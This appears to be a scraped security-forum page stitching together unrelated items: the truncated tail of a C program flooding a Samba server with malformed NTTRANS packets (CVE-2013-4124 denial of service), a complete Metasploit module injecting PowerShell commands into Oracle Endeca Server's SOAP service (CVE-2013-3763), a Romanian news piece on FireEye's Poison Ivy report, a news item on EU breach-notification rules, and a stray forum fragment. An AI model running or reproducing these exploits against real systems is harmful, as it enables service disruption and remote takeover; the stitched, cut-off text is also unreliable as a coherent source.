"read() failed, reason: '%s' (code %i)\n", strerror(errno), errno); exit(-errno); } nbt_hdr = (struct nbt_session_header *)packet; base_hdr = (struct smb_base_header *)(packet + sizeof (struct nbt_session_header)); tx_hdr = (struct tconx_reply_header *)(packet + sizeof (struct nbt_session_header) + sizeof (struct smb_base_header)); memcpy(&tid, &base_hdr->tid, sizeof (uint16)); memcpy(&bytecount, &tx_hdr->bytecount, sizeof (uint16)); printf("tree connect complete, got assigned tid %i\n", tid); } void nttrans_request(int fd, unsigned int offset_wrap) { // packet = nbt session header + smb base header + nttrans header! char packet[sizeof (struct nbt_session_header) + sizeof (struct smb_base_header) + sizeof (struct nttrans_request_header)]; struct nttrans_request_header nttrans_hdr; // nttrans header! int size=0; int function = SMB_NTTRANSCREATE; // NTTRANSCREATE! int totalparamcount = TOTALCOUNT; int totaldatacount = 0; uint8 setupcount = 0; memset(&nttrans_hdr, 0, sizeof nttrans_hdr); // construct nbt session header construct_nbt_session_header(packet, SMB_SESSION, 0, sizeof (packet) - sizeof (struct nbt_session_header)); // construct smb base header construct_smb_base_header(packet + sizeof (struct nbt_session_header), SMB_NTTRANS, 8, 1, tid, pid, uid, 1); // construct nttrans header sprintf(nttrans_hdr.paramoffset, "%p", offset_wrap); /********** * XXX data offset 0xffffffff to 0xf1000000 to integer wrap * the offset exploits the security bug of CVE-2013-4124 * samba remote dos! */ sprintf(nttrans_hdr.dataoffset, "%p", offset_wrap); nttrans_hdr.wordcount = 19 + setupcount; memcpy(&nttrans_hdr.function, &function, sizeof (uint16)); memcpy(&nttrans_hdr.totalparamcount, &totalparamcount, sizeof (uint32)); memcpy(&nttrans_hdr.totaldatacount, &totaldatacount, sizeof (uint32)); memcpy(packet + sizeof (struct nbt_session_header) + sizeof (struct smb_base_header), &nttrans_hdr, sizeof nttrans_hdr); // send samba packet! size = write(fd, packet, sizeof (packet)); close(fd); } static char banner[]={ " ___ ___ \n" \ " / _ \\ / _ \\ \n" \ " __ __| (_) || | | | ___ \n" \ " \\ \\/ / \\__. || | | | / __| \n" \ " > < / / | |_| || (__ \n" \ " /_/\\_\\ /_/ \\___/ \\___| \n" \ }; int main(int argc, char *argv[]) { int fd; struct sockaddr_in s_in; char target_ip[16]; char server_name[32]; int smb_port=139; unsigned int offset_wrap=0x00000000; printf("%s\n\nsamba nttrans reply exploit\n\n", banner); if(argc < 2){ fprintf(stderr, "samba nttrans reply exploit Usage:\n\n./samba_exploit [target ip addr] <server name>\n\n" "ex) ./samba_exploit 10.0.1.16\n" "ex) ./samba_exploit 10.0.1.16 MYSAMBA\n\n"); exit(-1); } strncpy(target_ip, argv[1], 16); if(argc==3){ memset(server_name, 0, sizeof server_name); strncpy(server_name, argv[2], sizeof(server_name)-1); } else{ sprintf(server_name, "SAMBA"); } printf("[*] SERVER NAME: %s\n", server_name); memset(&s_in, 0, sizeof (s_in)); s_in.sin_family = AF_INET; s_in.sin_port = htons(smb_port); // samba port=139/tcp s_in.sin_addr.s_addr = inet_addr(target_ip); fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); connect(fd, (struct sockaddr *)&s_in, sizeof (s_in)); // nbt(netbios over tcpip, nbtstat) session request nbt_session_request(fd, "BOSSA", server_name); // adjust computer names(clientname, servername) process_nbt_session_reply(fd); // protocol negotiation negprot_request(fd); process_negprot_reply(fd); // session setup sesssetupx_request(fd); // setup request process_sesssetupx_reply(fd); // setup reply // tree connection setup tconx_request(fd); process_tconx_reply(fd); // exploit! printf("[*] nttrans reply exploit!\n"); // 0xffffffff ~ 0xf100000000 to integer wrap for(offset_wrap=0xffffffff; offset_wrap >= 0xf1000000; --offset_wrap){ printf("[-] offset to wrap up: %p\n", offset_wrap); nttrans_request(fd, offset_wrap); } close(fd); return 0; }

Description : This Metasploit module exploits a command injection vulnerability on the Oracle Endeca Server 7.4.0. The vulnerability exists on the createDataStore method from the controlSoapBinding web service. The vulnerable method only exists on the 7.4.0 branch and isn't available on the 7.5.5.1 branch. On the other hand, the injection has been found to be Windows specific. This Metasploit module has been tested successfully on Endeca Server 7.4.0.787 over Windows 2008 R2 (64 bits). Author : rgod, juan vazquez Source : Oracle Endeca Server Remote Command Execution ? Packet Storm Code : ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Powershell def initialize super( 'Name' => 'Oracle Endeca Server Remote Command Execution', 'Description' => %q{ This module exploits a command injection vulnerability on the Oracle Endeca Server 7.4.0. The vulnerability exists on the createDataStore method from the controlSoapBinding web service. The vulnerable method only exists on the 7.4.0 branch and isn't available on the 7.5.5.1 branch. On the other hand, the injection has been found to be Windows specific. This module has been tested successfully on Endeca Server 7.4.0.787 over Windows 2008 R2 (64 bits). }, 'Author' => [ 'rgod <rgod[at]autistici.org>', # Vulnerability discovery 'juan vazquez' # Metasploit module ], 'Platform' => 'win', 'Arch' => [ ARCH_X86_64, ARCH_X86 ], 'References' => [ [ 'CVE', '2013-3763' ], [ 'BID', '61217' ], [ 'OSVDB', '95269' ], [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-190/' ], [ 'URL', 'http://www.oracle.com/technetwork/topics/security/cpujuly2013-1899826.html' ] ], 'Targets' => [ [ 'Oracle Endeca Server 7.4.0 / Microsoft Windows 2008 R2 64 bits', { } ] ], 'DefaultTarget' => 0, 'Privileged' => false, 'DisclosureDate' => 'Jul 16 2013' ) register_options( [ Opt::RPORT(7770), OptString.new('TARGETURI', [true, 'The URI path of the Control Web Service', '/ws/control']) ], self.class) end def peer return "#{rhost}:#{rport}" end def version_soap soap = <<-eos <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ns="http://www.endeca.com/endeca-server/control/1/0"> <soapenv:Header/> <soapenv:Body> <ns:version/> </soapenv:Body> </soapenv:Envelope> eos return soap end def create_data_store_soap(name, files) soap = <<-eos <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ns="http://www.endeca.com/endeca-server/control/1/0"> <soapenv:Header/> <soapenv:Body> <ns:createDataStore> <ns:dataStoreConfig> <ns:name>#{name}</ns:name> <ns:dataFiles>#{files}</ns:dataFiles> </ns:dataStoreConfig> </ns:createDataStore> </soapenv:Body> </soapenv:Envelope> eos return soap end def check res = send_request_soap(version_soap) if res.nil? or res.code != 200 or res.body !~ /versionResponse/ return Exploit::CheckCode::Safe end version_match = res.body.match(/<serverVersion>Oracle Endeca Server ([0-9\.]*) /) if version_match.nil? return Exploit::CheckCode::Unknown else version = version_match[1] end print_status("#{peer} - Version found: Oracle Endeca Server #{version}") if version =~ /7\.4\.0/ and version <= "7.4.0.787" return Exploit::CheckCode::Vulnerable end return Exploit::CheckCode::Safe end def send_request_soap(data) res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path), 'method' => 'POST', 'ctype' => 'text/xml; charset=utf-8', 'headers' => { 'SOAPAction' => "\"\"" }, 'data' => data }) return res end def exploit command = cmd_psh_payload(payload.encoded) if command.length > 8000 # Windows 2008 Command Prompt Max Length is 8191 fail_with(Failure::BadConfig, "#{peer} - The selected paylod is too long to execute through powershell in one command") end print_status("#{peer} - Exploiting through Powershell...") execute_command(command) end def execute_command(cmd) # HTML encode ampersands so SOAP is correctly interpreted cmd.gsub!(/&/, "&") injection = "c:\\"& #{cmd} &"" exploit_data = create_data_store_soap(rand_text_alpha(4), injection) begin res = send_request_soap(exploit_data) if res.nil? or res.code != 500 or ( res.body !~ /Error creating data files at/ and res.body !~ /Data files don't exist/ ) print_status("#{res.code}\n#{res.body}") if res fail_with(Failure::UnexpectedReply, "#{peer} - Unable to execute the CMD Stager") end rescue ::Rex::ConnectionError fail_with(Failure::Unreachable, "#{peer} - Unable to connect") end end end

Firma de securitate Fireeye a descoperit ca popularul troian Poison Ivy, care a fost folosit pentru a ataca infrastructura RSA SecurID in 2011, este inca puternic dupa opt ani de zile si continua sa fie folosit in atacurile targeted Fireeye a anuntat acest lucru intr-un raport intitulat "Poison Ivy: Assessing Damage and Extracting Intelligence", sustinand ca instrumentul remote access (RAT) nu este blocat si continua sa fie favoritul unora dintre hackeri. "Respingerea acestei categorii comune de malware ar putea fi o greseala costisitoare", a explicat Darien Kindlund, manager pentru inteligenta amenintarii in cadrul Fireeye, intr-un post blog. "In ciuda reputatiei sale de software pentru atacatori novice, RAT-urile continua sa fie o piesa a multor atacuri cibernetice sofisticate si sunt utilizate de numerosi atacatori". Kindlund a declarat ca Fireeye identifica sute de atacuri care utilizeaza Poison Ivy, vizand companii importante, ceea ce este ingrijorator, deoarece acesta a fost folosit in cateva campanii malware high profile, cea mai cunoscuta fiind aceea din 2011, care a compromis datele RSA SecurID. In acelasi an, Poison Ivy a alimentat un atac denumit "Nitro" impotriva producatorilor de produse chimice, birourilor guvernamentale, firmelor de aparare si grupurilor pentru drepturile omului. Raportul Fireeye prezinta, de asemenea, informatii cu privire la actorii care constituie amenintari pentru securitatea natiunii si care profita de Poison Ivy, printre care se numara: "admin@338", care vizeaza industria serviciilor financiare; "th3bug", care vizeaza invatamantul superior si industria sanatatii, precum si "menuPass", care vizeaza SUA si contractorii din strainatate in domeniul apararii. Firma de securitate a lansat un set de instrumente, denumit Calamine, pentru a ajuta organizatiile sa detecteze posibile infectii cu Poison Ivy. "Cu pachetul Calamine, profesionistii in domeniul securitatii pot identifica indicatori ai unui posibil atac Poison IvyW, a declarat Fireeye. "Calamine ar putea sa nu opreasca atacatorii care utilizeaza Poison Ivy, insa poate ingreuna mult eforturile acestora". Source : THE INQUIRER - News, reviews and opinion for tech buffs

European Union regulations designed to force telecom operators and internet service providers (ISPs) to notify national authorities within 24 hours of detecting a data breach are set to take effect on 25 August, despite widespread criticism from numerous UK government bodies. The laws mean that the companies will have to report any cyber incidents resulting in theft or unauthorised access to customer data to the relevant law enforcement agency within just one day. ISPs and telecoms firms have already been subject to this law, but the 24-hour notification regime is new, as European Commission (EC) vice president Neelie Kroes looks to strengthen the data protection regime in Europe. However, the wider reforms for data breach disclosure, which could see the same burdens on ISps and telecoms firms placed on all industries, have been widely criticised by groups in both the private and public sector. Experts from numerous security firms, including Trend Micro and F-Secure, arguing that while they are well intentioned there is no realistic way to police the laws fairly or safely. They also warned that by forcing companies to disclose attack data so quickly, businesses will not have time to do adequate cyber forensics work, meaning that to act within the law they will have to take ill-conceived, knee-jerk actions in reaction to attacks - a practice that security firm's like Detica have warned against for some time. The laws come as a wider debate on future European data protection laws undergo fierce debate. The legislation has attracted the ire of UK Justice Minister Lord McNally, who has criticised the European Commission's data protection draft, warning that the overarching legislation will cause untold damage to the British economy. Lord McNally said that the unrealistic time frame of the proposal will force many smaller businesses to operate outside the law, risking potentially devastating fines. The calls for change have met with some success, with recent reports suggesting that the European Parliament is deadlocked on whether to rethink the 24-hour disclosure time frame. The vote to decide whether the law should remain the same is scheduled to take place in October, with amended legislation hoped for before the European elections in May 2014. Source V3.CO.UK

Apare doar cui dam.Cine ne da noua nu.

Numele celui care iti da reputatie pozitie sau negativa.